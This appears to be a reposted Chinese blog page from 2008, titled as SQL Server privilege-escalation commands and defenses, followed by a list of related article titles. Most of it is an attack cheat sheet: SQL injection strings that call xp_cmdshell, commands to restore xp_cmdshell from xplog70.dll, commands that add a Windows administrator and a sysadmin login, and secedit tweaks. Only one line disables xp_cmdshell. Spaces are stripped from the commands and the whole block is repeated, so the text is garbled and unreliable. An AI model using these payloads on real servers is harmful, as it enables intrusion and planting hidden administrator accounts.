提升权限相关命令及防范
2008-04-28 11:07
246 查看
;execmaster..xp_cmdshell"netusernamepassword/add"--
;execmaster..xp_cmdshell"netlocalgroupadministratorsname/add"--
程序代码开启cmdshell的SQL语句
EXECsp_addextendedprocxp_cmdshell,@dllname='xplog70.dll'
判断存储扩展是否存在
selectcount(*)frommaster.dbo.sysobjectswherextype='X'andname='xp_cmdshell'
返回结果为1就OK
恢复xp_cmdshell
Execmaster.dbo.addextendedproc'xp_cmdshell','xplog70.dll';selectcount(*)frommaster.dbo.sysobjectswherextype='X'andname='xp_cmdshell'
返回结果为1就OK
否则上传xplog7.0.dll
Execmaster.dbo.addextendedproc'xp_cmdshell','C:/WinNt/System32/xplog70.dll'
堵上cmdshell的SQL语句
sp_dropextendedproc"xp_cmdshell"
:
dirc:/
dird:/
dire:/
netuserTsInternetUsersPassword/add
netlocalGroupAdministratorsTsInternetUsers/add
备份恢复IPSEC
secedit/export/CFGc:/tmp.inf
echosedenynetworklogonright=>>c:/tmp.inf
secedit/configure/dbc:/windows/secedit.sdb/CFGc:/tmp.inf
SQL:
execmaster..sp_addloginUserName,Password
execmaster..sp_addsrvrolememberUserName,sysadmin
;execmaster..xp_cmdshell"netlocalgroupadministratorsname/add"--
程序代码开启cmdshell的SQL语句
EXECsp_addextendedprocxp_cmdshell,@dllname='xplog70.dll'
判断存储扩展是否存在
selectcount(*)frommaster.dbo.sysobjectswherextype='X'andname='xp_cmdshell'
返回结果为1就OK
恢复xp_cmdshell
Execmaster.dbo.addextendedproc'xp_cmdshell','xplog70.dll';selectcount(*)frommaster.dbo.sysobjectswherextype='X'andname='xp_cmdshell'
返回结果为1就OK
否则上传xplog7.0.dll
Execmaster.dbo.addextendedproc'xp_cmdshell','C:/WinNt/System32/xplog70.dll'
堵上cmdshell的SQL语句
sp_dropextendedproc"xp_cmdshell"
:
dirc:/
dird:/
dire:/
netuserTsInternetUsersPassword/add
netlocalGroupAdministratorsTsInternetUsers/add
备份恢复IPSEC
secedit/export/CFGc:/tmp.inf
echosedenynetworklogonright=>>c:/tmp.inf
secedit/configure/dbc:/windows/secedit.sdb/CFGc:/tmp.inf
SQL:
execmaster..sp_addloginUserName,Password
execmaster..sp_addsrvrolememberUserName,sysadmin
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- SQL Server提升权限相关命令及防范
- SQL Server提升权限相关命令及防范
- SQL Server 提升权限相关命令及防范
- SQL Server提升权限相关命令及防范
- SQL Server提升权限相关命令及防范
- SQL Server 提升权限相关命令及防范
- SQLServer提升权限相关命令及防范
- SQL Server 提升权限相关命令及防范
- SQLServer提升权限相关命令及防范
- error MSB8011: 未能注册输出。请尝试启用“逐用户重定向”,或者使用提升的权限从命令提示符处注册该组件
- 12月20日笔记 文件、目录权限及相关操作命令
- Linux下常见权限操作相关命令
- 提升进程权限函数OpenProcessToken 及相关函数详解
- 文件或目录权限相关命令
- 《The Linux Command Line》 读书笔记04 Linux用户以及权限相关命令
- 文件权限、用户、用户组相关命令
- Linux中用户,组及权限的概念及相关命令
- 请尝试启用“逐用户重定向”,或者使用提升的权限从命令提示符处注册该组件 错误解决
- 动网dvbbs7.1论坛权限提升漏洞及防范(图)
- 限制使用su命令的用户与使用sudo机制提升权限